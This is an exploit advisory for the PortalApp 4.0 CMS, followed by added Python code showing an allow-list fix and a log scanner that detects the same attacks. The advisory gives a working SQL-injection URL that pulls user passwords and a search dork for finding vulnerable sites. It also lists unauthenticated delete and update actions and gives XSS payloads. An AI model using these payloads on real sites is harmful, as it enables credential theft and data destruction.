##############################################################################
# Title: PortalApp 4.0 Multiple vulnerabilities                              #
#                                                                            #
# Discovered By: r3dm0v3                                                     #
#   http://r3dm0v3.persianblog.ir                                            #
#   r3dm0v3( 4t }yahoo[dot}com                                               #
#   Tehran - Iran                                                            #
#                                                                            #
# Vendor: http://www.portalapp.com                                           #
# Vulnerable Version: 4.0, prior versions may be vulnerable                  #
# Remote Exploit: Yes                                                        #
# Dork: "Copyright @2007 Iatek LLC"                                          #
# Fix: Not Available                                                         #
##############################################################################

##############################################################################
# SQL Injection (CRITICAL)                                                   #
##############################################################################

# Description: PortalApp is a Content Management System (CMS) for websites.
#
# Bug: the user input 'sortby' in forums.asp is concatenated directly into
# the SQL statement, so a UNION SELECT appended to it pulls rows from the
# Users table into the search results. The injected SELECT supplies 15
# columns to match the original query; positions 6, 7, 11 and 12 are the
# ones the page renders.
#
# Exploit:
http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users

# In the rendered search results:
#   author  will be the user names
#   topic   will be the passwords
#   replies will be the user IDs
#   views   will be the access levels (5 is super admin)

##############################################################################
# The following actions in 'forums.asp' can be performed without any         #
# authentication.                                                            #
##############################################################################

create a forum (form fields):
  userid          (by default 255 is sa)
  ForumName
  Description
  ForumSection
  DisplayOrder

create a topic (form fields):
  userid          (by default 255 is sa)
  ForumID
  Subject
  Message
  Icon
  Show Signature
  Notify
  Locked
  Sticky
  Date
  DateLast
delete a forum:
http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]

delete a topic:
http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]

delete a reply:
http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]

delete a topic reply:
http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]

# Other forums.asp actions reachable the same way, without authentication:
#   insert_level3_edit_disc_replies
#   insert_detail_disc_topics
#   update_level1_edit_disc_forums
#   update_level2_edit_disc_topics
#   update_level3_edit_disc_replies
#   update_detail_disc_topics
#   update_level2_disc_replies

##############################################################################
# The following actions in 'Content.asp' can be performed without any        #
# authentication.                                                            #
##############################################################################

Add content (form fields):
  userid          (by default 255 is sa)
  ContentTypeID   1: general (company)  2: article  3: link  4: news
                  5: announcement  6: download  7: gallery  8: faq ...
  catID
  Date
  Author
  title
  ShortDesc
  LongDesc
  relatedULR
  DownloadURL
  Filename
  Thumbnail
  Image1
  PrevContentID
  NextContentID
  views
  AVGRating
'insert_detail_content' is also vulnerable; use the same form fields as above.

##############################################################################
# XSS                                                                        #
##############################################################################

# The 'keywords' search parameter is reflected unencoded by both forums.asp
# and content.asp:
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1

# milw0rm.com [2008-01-06]
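Since no vendor fix is available, the usual remediation for the 'sortby' injection above is to stop pasting the parameter into SQL at all and map it through an allow-list of sort orders the page actually offers. The block below is an added illustration of that pattern in Python with sqlite3; it is not PortalApp's code (the product is classic ASP), the table and column names are constructed stand-ins, and the shape of the vulnerable query is an assumption, since the advisory only shows the payload, not the query it lands in.

```python
"""Allow-listed sort parameter versus string concatenation (added illustration, not PortalApp code)."""
import sqlite3

# Constructed stand-in schema; names are assumptions, not PortalApp's real tables.
SCHEMA = """
CREATE TABLE topics (topic_id INTEGER PRIMARY KEY, subject TEXT, user_id INTEGER,
                     replies INTEGER, views INTEGER, date_posted TEXT);
CREATE TABLE users (user_id INTEGER PRIMARY KEY, user_name TEXT, password TEXT, accesslevel INTEGER);
INSERT INTO topics VALUES (1, 'hello world', 255, 4, 120, '2008-01-02'),
                          (2, 'hello again', 12, 9, 30, '2008-01-05'),
                          (3, 'unrelated', 12, 0, 5, '2008-01-06');
INSERT INTO users VALUES (255, 'sa', 'hunter2', 5), (12, 'bob', 'letmein', 1);
"""

# The only sort orders the search page offers. The user-supplied key selects an
# entry here; the key itself never reaches the SQL text.
SORT_COLUMNS = {
    "date": "date_posted DESC",
    "replies": "replies DESC",
    "views": "views DESC",
    "subject": "subject ASC",
}

# The advisory's payload, percent-decoded as the ASP page would see it.
PAYLOAD = ("users.user_name UNION SELECT 1,2,3,4,5,password,user_name,8,9,10,"
           "user_id,accesslevel,13,14,15 FROM Users")


def vulnerable_search_sql(keywords, sortby):
    """Assumed shape of the broken query: both inputs are pasted in verbatim.

    Returned as text only and never executed here; what the injected UNION
    does in practice depends on the real query, which the advisory does not show.
    """
    return ("SELECT subject, user_id, replies, views FROM topics "
            "WHERE subject LIKE '%" + keywords + "%' ORDER BY " + sortby)


def hardened_search(conn, keywords, sortby="date"):
    """Search topics with a bound keyword and an allow-listed sort order."""
    try:
        order = SORT_COLUMNS[sortby.lower()]
    except KeyError:
        # Unknown keys are rejected rather than silently defaulted, so probing shows up in logs.
        raise ValueError("unknown sort key: %r" % sortby) from None
    sql = ("SELECT subject, user_id, replies, views FROM topics "
           "WHERE subject LIKE ? ORDER BY " + order)
    return conn.execute(sql, ("%" + keywords + "%",)).fetchall()


def rejects_sort_key(conn, sortby):
    """True when the hardened search refuses the given sort key."""
    try:
        hardened_search(conn, "hello", sortby)
    except ValueError:
        return True
    return False


def make_db():
    """In-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


if __name__ == "__main__":
    db = make_db()
    print("legit:", hardened_search(db, "hello", "views"))
    print("payload rejected:", rejects_sort_key(db, PAYLOAD))
    print("vulnerable text:", vulnerable_search_sql("r3dm0v3", PAYLOAD))
```

The keyword still goes through a bound parameter; only the ORDER BY fragment is assembled from code-controlled strings, because SQL engines do not accept a placeholder in that position.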
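With no patch, the other thing a site owner can do is look for these requests in the web server logs. The following is an added Python example, not part of the original advisory, that classifies requests against the three issues described above: a UNION SELECT in 'sortby', the forums.asp / Content.asp action names the advisory lists, and script markup in 'keywords'. The log lines are constructed in a simplified IIS W3C style (date, time, client IP, method, URI stem, URI query, status), which is an assumption about the log layout; adjust the regex to the real field order. Hits on the action names are triage leads only, since legitimate administrators use the same actions and the log does not say whether the request carried a valid session.

```python
"""Triage web logs for the PortalApp 4.0 request patterns in this advisory (added example)."""
import re
from urllib.parse import parse_qs, unquote

# Action values the advisory names as reachable without authentication.
FORUM_ACTIONS = {
    "delete_level1_edit_disc_forums", "delete_level2_edit_disc_topics",
    "delete_level3_edit_disc_replies", "delete_level2_disc_replies",
    "insert_level3_edit_disc_replies", "insert_detail_disc_topics",
    "update_level1_edit_disc_forums", "update_level2_edit_disc_topics",
    "update_level3_edit_disc_replies", "update_detail_disc_topics",
    "update_level2_disc_replies",
}
CONTENT_ACTIONS = {"insert_detail_content"}

UNION_RE = re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.IGNORECASE)
SCRIPT_RE = re.compile(r"<\s*script\b|javascript:|\bon\w+\s*=", re.IGNORECASE)

# Assumed line layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_RE = re.compile(
    r"^(?P<date>\S+) (?P<time>\S+) (?P<ip>\S+) (?P<method>\S+) "
    r"(?P<stem>\S+) (?P<query>\S+) (?P<status>\d{3})$"
)


def classify_request(uri_stem, uri_query):
    """Return the list of finding tags for one request; empty means nothing matched."""
    findings = []
    stem = uri_stem.lower()
    # parse_qs percent-decodes and turns '+' into spaces, which is what the ASP page
    # sees. Names are lowered because Request.QueryString is case-insensitive.
    params = {k.lower(): v for k, v in parse_qs(uri_query, keep_blank_values=True).items()}

    def first(name):
        return params.get(name, [""])[0]

    is_forums = stem.endswith("/forums.asp")
    is_content = stem.endswith("/content.asp")
    if is_forums:
        if UNION_RE.search(first("sortby")):
            findings.append("sqli:sortby")
        if first("action") in FORUM_ACTIONS:
            findings.append("unauth-action:" + first("action"))
    if is_content and first("action") in CONTENT_ACTIONS:
        findings.append("unauth-action:" + first("action"))
    if is_forums or is_content:
        # Second unquote catches double-encoded payloads such as %253Cscript.
        if SCRIPT_RE.search(unquote(first("keywords"))):
            findings.append("xss:keywords")
    return findings


def scan_log(lines):
    """Return (client_ip, uri_stem, finding) for every log line that matches a pattern."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = LOG_RE.match(line)
        if not m:
            continue
        query = "" if m["query"] == "-" else m["query"]
        for finding in classify_request(m["stem"], query):
            hits.append((m["ip"], m["stem"], finding))
    return hits


# Constructed sample log: one benign search, the advisory's three request types
# from a single client, and one benign content search.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2008-01-06 10:01:02 198.51.100.7 GET /forums.asp keywords=hello&do_search=1&sortby=DateLast 200
2008-01-06 10:02:15 203.0.113.9 GET /forums.asp keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users 200
2008-01-06 10:03:40 203.0.113.9 GET /forums.asp action=delete_level1_edit_disc_forums&ForumId=3 302
2008-01-06 10:04:01 203.0.113.9 GET /content.asp ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1 200
2008-01-06 10:05:22 192.0.2.44 GET /content.asp ContentType=News&keywords=budget&do_search=1 200
"""

if __name__ == "__main__":
    for ip, stem, finding in scan_log(SAMPLE_LOG.splitlines()):
        print(ip, stem, finding)
```

The UNION check is deliberately loose about spacing and 'ALL', and the XSS check fires on more than a literal script tag, because both are cheap to widen and the follow-up is a human look at the request anyway.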